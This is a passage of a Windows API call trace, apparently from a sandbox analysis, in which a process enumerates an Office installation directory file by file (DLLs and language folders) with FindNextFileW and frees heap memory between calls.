lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x38b7c4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14c48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="MeetingJoinAxOC.dll", cAlternateFileName="MEETIN~1.DLL")) returned 1 [0186.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.016] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6dea551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6dea551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6dea551, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bg", cAlternateFileName="")) returned 1 [0186.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.016] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ca", cAlternateFileName="")) returned 1 [0186.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.017] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf803d796, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf803d796, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf803d796, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cs", cAlternateFileName="")) returned 1 [0186.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.017] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6165f55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6165f55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="da", cAlternateFileName="")) returned 1 [0186.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.017] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="de", cAlternateFileName="")) returned 1 [0186.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.018] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff0bc27, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff31e88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="el", cAlternateFileName="")) returned 1 [0186.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.018] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5a3de35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a3de35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a3de35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="en-us", cAlternateFileName="")) returned 1 [0186.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.018] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcb7dd00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcb7dd00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcb7dd00, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="es", cAlternateFileName="")) returned 1 [0186.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.018] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="et", cAlternateFileName="")) returned 1 [0186.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.019] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37869c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="eu", cAlternateFileName="")) returned 1 [0186.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.019] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fi", cAlternateFileName="")) returned 1 [0186.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.019] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fr", cAlternateFileName="")) returned 1 [0186.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.019] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa178468, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa178468, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa178468, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="gl", cAlternateFileName="")) returned 1 [0186.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.020] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf618b1a4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf618b1a4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf618b1a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="he", cAlternateFileName="")) returned 1 [0186.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.020] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hi", cAlternateFileName="")) returned 1 [0186.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.020] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf480feb5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf480feb5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hr", cAlternateFileName="")) returned 1 [0186.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.021] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4646280, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4646280, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hu", cAlternateFileName="")) returned 1 [0186.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.021] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63a229e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x63a229e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x63a229e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="id", cAlternateFileName="")) returned 1 [0186.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.021] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ae17b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ae17b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ae17b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10fcc8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ipcsecproc.dll", cAlternateFileName="IPCSEC~1.DLL")) returned 1 [0186.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.021] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aef645, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ja", cAlternateFileName="")) returned 1 [0186.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.022] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6781ff8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6781ff8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="kk", cAlternateFileName="")) returned 1 [0186.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.022] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f9c329, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5f9c329, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5f9c329, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ko", cAlternateFileName="")) returned 1 [0186.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.022] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1bce2f5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1bce2f5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1bf45a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lt", cAlternateFileName="")) returned 1 [0186.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.022] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf13037fa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf13037fa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lv", cAlternateFileName="")) returned 1 [0186.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.023] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc21a8ad, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc21a8ad, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc21a8ad, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ms", cAlternateFileName="")) returned 1 [0186.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.023] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0dcc568, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0dcc568, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b3ce622, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f9f00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msipc.dll", cAlternateFileName="")) returned 1 [0186.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.023] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffe01c35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffe01c35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffe01c35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="no", cAlternateFileName="")) returned 1 [0186.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.024] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68ff786, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x68ff786, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69259a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pl", cAlternateFileName="")) returned 1 [0186.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.024] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc2b31ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2b31ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt", cAlternateFileName="")) returned 1 [0186.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.024] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x386b77a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x386b77a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x386b77a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0186.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.025] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4903b8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4903b8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4903b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ro", cAlternateFileName="")) returned 1 [0186.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.025] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x86a6c5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ru", cAlternateFileName="")) returned 1 [0186.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.025] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sk", cAlternateFileName="")) returned 1 [0186.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.025] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a7cf13, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a7cf13, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sl", cAlternateFileName="")) returned 1 [0186.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.026] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1565dae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1565dae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1565dae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Cyrl-BA", cAlternateFileName="SR-CYR~1")) returned 1 [0186.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.026] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf443017d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf443017d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf44563cd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Cyrl-CS", cAlternateFileName="SR-CYR~2")) returned 1 [0186.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.026] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ae94c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0186.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.026] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sv", cAlternateFileName="")) returned 1 [0186.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.027] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb67b102, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb67b102, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6ed802, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="th", cAlternateFileName="")) returned 